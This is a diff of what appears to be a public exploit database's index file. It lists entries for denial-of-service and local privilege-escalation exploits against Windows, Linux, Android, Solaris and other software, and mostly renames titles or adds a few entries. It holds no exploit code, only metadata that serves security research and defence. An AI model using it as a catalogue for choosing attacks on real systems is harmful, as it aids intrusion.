gaffie",dos,windows, 41232,exploits/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",dos,android, 41278,exploits/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,dos,openbsd,80 -41363,exploits/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",dos,windows, +41363,exploits/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",dos,windows, 41350,exploits/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,dos,linux, 41351,exploits/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",dos,android, 41352,exploits/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",dos,android, @@ -5419,7 +5419,7 @@ id,file,description,date,author,type,platform,port 41610,exploits/multiple/dos/41610.txt,"Adobe Flash - ATF Thumbnailing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, 41611,exploits/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, 41612,exploits/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, -41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",dos,windows, +41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow",2017-03-15,"Hossein Lotfi",dos,windows, 41620,exploits/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",dos,windows, 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows, 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows, @@ -5428,18 +5428,18 @@ id,file,description,date,author,type,platform,port 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41647,exploits/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41648,exploits/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41649,exploits/windows/dos/41649.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41650,exploits/windows/dos/41650.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41651,exploits/windows/dos/41651.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41652,exploits/windows/dos/41652.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41653,exploits/windows/dos/41653.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption Around 'USP10!BuildFSM' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41647,exploits/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41648,exploits/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41649,exploits/windows/dos/41649.txt,"Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41650,exploits/windows/dos/41650.txt,"Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41651,exploits/windows/dos/41651.txt,"Microsoft Windows - Uniscribe Font Processing Heap Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41652,exploits/windows/dos/41652.txt,"Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41653,exploits/windows/dos/41653.txt,"Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption Around 'USP10!BuildFSM' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 41654,exploits/windows/dos/41654.txt,"Microsoft Windows - Uniscribe Font Processing Buffer Overflow in 'USP10!FillAlternatesList' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41655,exploits/windows/dos/41655.txt,"Microsoft Windows - Uniscribe Font Processing Multiple Heap-Based Out-of-Bounds and Wild Reads (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41655,exploits/windows/dos/41655.txt,"Microsoft Windows - Uniscribe Font Processing Multiple Heap Out-of-Bounds and Wild Reads (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 41656,exploits/windows/dos/41656.txt,"Microsoft GDI+ - 'gdiplus!GetRECTSForPlayback' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, 41657,exploits/windows/dos/41657.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!Fill_ushort_ELUTs_from_lut16Tag' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, -41658,exploits/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",dos,windows, +41658,exploits/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",dos,windows, 41659,exploits/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, 41660,exploits/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",dos,multiple, 41661,exploits/windows/dos/41661.html,"Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",dos,windows, @@ -5506,7 +5506,7 @@ id,file,description,date,author,type,platform,port 41982,exploits/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",dos,android, 41983,exploits/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflow",2017-05-09,"Google Security Research",dos,android, 41984,exploits/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,dos,multiple, -41991,exploits/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",dos,linux, +41991,exploits/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap Buffer Overflow",2017-05-10,"Core Security",dos,linux, 41993,exploits/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,dos,multiple,1194 42001,exploits/windows/dos/42001.py,"Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, 42002,exploits/windows/dos/42002.txt,"Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, @@ -5593,7 +5593,7 @@ id,file,description,date,author,type,platform,port 42231,exploits/windows/dos/42231.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, 42232,exploits/windows/dos/42232.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, 42233,exploits/windows/dos/42233.cpp,"Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, -42234,exploits/windows/dos/42234.txt,"Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap-Based Memory Corruption",2017-06-23,"Google Security Research",dos,windows, +42234,exploits/windows/dos/42234.txt,"Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap Memory Corruption",2017-06-23,"Google Security Research",dos,windows, 42235,exploits/windows/dos/42235.txt,"Microsoft Windows - 'USP10!ttoGetTableData' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, 42236,exploits/windows/dos/42236.txt,"Microsoft Windows - 'USP10!SubstituteNtoM' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, 42237,exploits/windows/dos/42237.txt,"Microsoft Windows - 'USP10!CreateIndexTable' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, @@ -5611,7 +5611,7 @@ id,file,description,date,author,type,platform,port 42249,exploits/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",dos,multiple, 42253,exploits/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,dos,windows, 42258,exploits/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, -42259,exploits/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, +42259,exploits/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, 42260,exploits/multiple/dos/42260.py,"IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow",2017-06-26,defensecode,dos,multiple, 42264,exploits/windows/dos/42264.txt,"Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API",2017-06-27,"Google Security Research",dos,windows, 42272,exploits/netbsd_x86/dos/42272.c,"NetBSD - 'Stack Clash' (PoC)",2017-06-28,"Qualys Corporation",dos,netbsd_x86, @@ -5678,9 +5678,9 @@ id,file,description,date,author,type,platform,port 42495,exploits/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",dos,windows, 42546,exploits/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,dos,linux, 42518,exploits/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",dos,hardware, -42600,exploits/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",dos,linux, +42600,exploits/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap Buffer Overflow",2017-09-01,"Ke Liu",dos,linux, 42602,exploits/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",dos,multiple, -42652,exploits/linux/dos/42652.txt,"tcprewrite - Heap-Based Buffer Overflow",2017-09-11,FarazPajohan,dos,linux, +42652,exploits/linux/dos/42652.txt,"tcprewrite - Heap Buffer Overflow",2017-09-11,FarazPajohan,dos,linux, 42666,exploits/multiple/dos/42666.txt,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (1)",2017-09-12,"Google Security Research",dos,multiple, 42747,exploits/windows/dos/42747.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, 42741,exploits/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, @@ -5703,14 +5703,14 @@ id,file,description,date,author,type,platform,port 42917,exploits/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",dos,windows, 42920,exploits/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,dos,windows, 42932,exploits/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",dos,linux, -42941,exploits/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, -42942,exploits/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, -42943,exploits/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, +42941,exploits/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap Overflow",2017-10-02,"Google Security Research",dos,multiple, +42942,exploits/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap Overflow",2017-10-02,"Google Security Research",dos,multiple, +42943,exploits/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack Overflow",2017-10-02,"Google Security Research",dos,multiple, 42944,exploits/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",dos,multiple, 42945,exploits/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",dos,multiple, 42946,exploits/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",dos,multiple, 42955,exploits/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",dos,multiple, -42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux, +42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux, 42962,exploits/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",dos,windows, 42969,exploits/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",dos,multiple, 42994,exploits/windows/dos/42994.txt,"Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution",2017-09-28,"Eduardo Braun Prado",dos,windows, @@ -5733,7 +5733,7 @@ id,file,description,date,author,type,platform,port 43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows, 43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows, 43131,exploits/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",dos,windows, -43133,exploits/multiple/dos/43133.php,"PHP 7.1.8 - Heap-Based Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",dos,multiple, +43133,exploits/multiple/dos/43133.php,"PHP 7.1.8 - Heap Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",dos,multiple, 43135,exploits/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,dos,windows, 43144,exploits/windows/dos/43144.txt,"PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free",2017-11-14,"X41 D-Sec GmbH",dos,windows, 43152,exploits/windows/dos/43152.js,"Microsoft Edge Chakra JIT - Type Confusion with switch Statements",2017-11-16,"Google Security Research",dos,windows, @@ -5761,6 +5761,8 @@ id,file,description,date,author,type,platform,port 43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows, 43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows, 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android, +43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux, +43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -5781,7 +5783,7 @@ id,file,description,date,author,type,platform,port 106,exploits/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow",2003-09-27,"Juan Escriba",local,linux, 114,exploits/solaris/local/114.c,"Solaris Runtime Linker (SPARC) - 'ld.so.1' Local Buffer Overflow",2003-10-27,osker178,local,solaris, 118,exploits/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Code Execution",2003-11-07,"Scott Bartram",local,bsd, -120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Privilege Escalation",2003-11-13,Li0n7,local,linux, +120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation",2003-11-13,Li0n7,local,linux, 122,exploits/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,local,windows, 125,exploits/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",local,bsd, 129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (PoC)",2003-12-02,"Christophe Devine",local,linux, @@ -5810,7 +5812,7 @@ id,file,description,date,author,type,platform,port 203,exploits/linux/local/203.sh,"vixie-cron - Local Privilege Escalation",2000-11-21,"Michal Zalewski",local,linux, 205,exploits/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Local Privilege Escalation",2000-11-29,Tlabs,local,linux, 206,exploits/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation",2000-11-29,mat,local,linux, -207,exploits/bsd/local/207.c,"BSDi 3.0 inc - Local Buffer Overflow / Privilege Escalation",2000-11-30,vade79,local,bsd, +207,exploits/bsd/local/207.c,"BSDi 3.0 inc - Local Buffer Overflow / Local Privilege Escalation",2000-11-30,vade79,local,bsd, 209,exploits/linux/local/209.c,"GLIBC - '/bin/su' Local Privilege Escalation",2000-11-30,localcore,local,linux, 210,exploits/solaris/local/210.c,"Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow",2000-11-30,warning3,local,solaris, 215,exploits/linux/local/215.c,"GLIBC locale - bug mount",2000-12-02,sk8,local,linux, @@ -5828,14 +5830,14 @@ id,file,description,date,author,type,platform,port 249,exploits/linux/local/249.c,"GLIBC locale - Format Strings",2003-01-15,logikal,local,linux, 250,exploits/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,local,solaris, 252,exploits/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow",2001-01-15,teleh0r,local,linux, -255,exploits/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Privilege Escalation",2001-01-19,teleh0r,local,linux, +255,exploits/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation",2001-01-19,teleh0r,local,linux, 256,exploits/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",local,solaris, 257,exploits/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,local,linux, 258,exploits/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read",2001-01-25,krochos,local,linux, 259,exploits/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,local,tru64, 260,exploits/linux/local/260.c,"splitvt < 1.6.5 - Local Overflow",2001-01-26,"Michel Kaempf",local,linux, 261,exploits/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,local,sco, -265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix, +265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix, 270,exploits/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation",2001-05-08,LSD-PLaNET,local,irix, 271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows, 272,exploits/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,local,windows, @@ -5859,9 +5861,9 @@ id,file,description,date,author,type,platform,port 332,exploits/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",local,solaris, 333,exploits/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",local,aix, 334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix, -335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix, +335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix, 336,exploits/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",local,irix, -337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Privilege Escalation",1997-05-27,"David Hedley",local,irix, +337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation",1997-05-27,"David Hedley",local,irix, 338,exploits/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm '-xrm' Local Privilege Escalation",1997-05-28,"David Hedley",local,solaris, 339,exploits/linux/local/339.c,"zgv - '$HOME' Local Buffer Overflow",1997-06-20,"BeastMaster V",local,linux, 341,exploits/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Local Overflow",1997-07-12,"Cristian Schipor",local,solaris, @@ -5901,7 +5903,7 @@ id,file,description,date,author,type,platform,port 587,exploits/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,local,linux, 591,exploits/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,local,linux, 600,exploits/linux/local/600.c,"GD Graphics Library - Local Heap Overflow (PoC)",2004-10-26,anonymous,local,linux, -601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,local,linux, +601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Buffer Overflow (PoC)",2004-10-26,infamous41md,local,linux, 602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",local,sco, 624,exploits/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read",2004-11-10,"Paul Starzetz",local,linux, 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple, @@ -5958,7 +5960,7 @@ id,file,description,date,author,type,platform,port 885,exploits/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,local,windows, 890,exploits/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,local,linux, 895,exploits/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)",2005-03-22,sd,local,linux, -896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Privilege Escalation",2005-03-22,vade79,local,osx, +896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation",2005-03-22,vade79,local,osx, 898,exploits/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,local,aix, 905,exploits/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,local,windows, 912,exploits/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Licence Recover",2005-04-04,Kozan,local,windows, @@ -6017,14 +6019,14 @@ id,file,description,date,author,type,platform,port 1182,exploits/solaris/local/1182.c,"Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation",2004-12-24,"Marco Ivaldi",local,solaris, 1185,exploits/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Local Privilege Escalation",2005-08-30,vade79,local,osx, 1186,exploits/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Local Privilege Escalation",2005-08-30,vade79,local,osx, -1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow",2005-08-30,vade79,local,linux, +1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow",2005-08-30,vade79,local,linux, 1197,exploits/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Escalation",2005-09-06,"Andrés Acunha",local,windows, 1198,exploits/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,local,windows, 1215,exploits/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Local Privilege Escalation",2005-09-14,Qnix,local,linux, 1229,exploits/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Local Privilege Escalation",2005-09-24,kingcope,local,linux, 1230,exploits/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Local Privilege Escalation",2005-09-24,kingcope,local,bsd, 1248,exploits/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",local,solaris, -1267,exploits/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow / Privilege Escalation",2005-10-20,qaaz,local,linux, +1267,exploits/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Local Buffer Overflow / Local Privilege Escalation",2005-10-20,qaaz,local,linux, 1297,exploits/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation",2005-11-07,"Xavier de Leon",local,linux, 1299,exploits/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Local Privilege Escalation",2005-11-08,Hunger,local,linux, 1300,exploits/linux/local/1300.sh,"Operator Shell (OSH) 1.7-14 - Local Privilege Escalation",2005-11-09,"Charles Stevenson",local,linux, @@ -6033,7 +6035,7 @@ id,file,description,date,author,type,platform,port 1316,exploits/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",local,linux, 